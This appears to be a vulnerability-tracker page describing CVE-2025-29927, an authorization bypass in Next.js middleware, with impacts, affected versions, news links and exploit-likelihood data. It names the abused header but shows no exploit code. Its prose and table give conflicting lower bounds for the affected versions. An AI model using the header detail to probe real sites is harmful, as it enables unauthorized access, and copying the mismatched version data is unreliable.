Authorization Bypass in Next.js Framework by Vercel
CVE-2025-29927
Key Information:
Badges
What is CVE-2025-29927?
CVE-2025-29927 is a critical vulnerability affecting the Next.js framework, a popular open-source React-based framework used for building full-stack web applications. This vulnerability, present in versions 1.11.4 through 12.3.5, 13.5.9, 14.2.25, and 15.2.3, enables attackers to bypass authorization checks implemented within middleware functions. Middleware, a key component designed to process requests before they reach the application, often handles essential security tasks, including user authentication and authorization.
The flaw stems from the mishandling of a specific HTTP request header, known as "x-middleware-subrequest." By crafting requests with this header, attackers can undermine the built-in authorization mechanisms of Next.js applications, effectively allowing them unauthorized access to sensitive resources. As this vulnerability compromises the fundamental security layering of the framework, organizations utilizing Next.js could be severely impacted, leading to unauthorized data disclosure, potential financial losses, and reputational damage.
Potential impact of CVE-2025-29927
-
Unauthorized Access: This vulnerability allows attackers to gain unauthorized access to protected resources. Once they bypass the security checks, they can manipulate, view, or expose sensitive data, leading to potential data breaches.
-
Application Integrity Risks: The exploitation of this flaw can result in attackers executing different actions within the application, thereby affecting its integrity. For example, attackers may alter user data, disrupt service functionality, or even introduce malicious payloads.
-
Denial-of-Service (DoS) Vulnerabilities: By exploiting the vulnerable middleware, attackers may force the application’s caching mechanisms into a state where legitimate requests cannot be processed—a scenario that could render critical services unavailable to end-users, resulting in service disruption and loss of trust among users.
Affected Version(s)
next.js >= 11.1.4, < 12.3.5 < 11.1.4, 12.3.5
next.js >= 14.0.0, < 14.2.25 < 14.0.0, 14.2.25
next.js >= 15.0.0, < 15.2.3 < 15.0.0, 15.2.3
Exploit Proof of Concept (PoC)
PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.
News Articles
H-ISAC TLP White Threat Bulletin: Critical Authorization Bypass Vulnerability Announced For Next.js Middleware (CVE-2025-29927) | AHA
On March 23, 2025, a critical vulnerability in Next.js middleware was disclosed and tracked as CVE-2025-29927.

Next.js Middleware Flaw Lets Attackers Bypass Authorization
A critical vulnerability in Next.js middleware allows attackers unauthorized access and control, impacting all versions of the framework.

CrushFTP Warns of HPPS Port Vulnerability Enabling Unauthorized Access
Both CrushFTP, a popular file transfer technology, and Next.js have come under scrutiny due to significant vulnerabilities.
References
EPSS Score
93% chance of being exploited in the next 30 days.
CVSS V3.1
Timeline
- 📰
First article discovered by The Hacker News
- 🟡
Public PoC available
- 👾
Exploit known to exist
- 🥇
Vulnerability reached the number 1 worldwide trending spot
- 📈
Vulnerability started trending
Vulnerability published
Vulnerability Reserved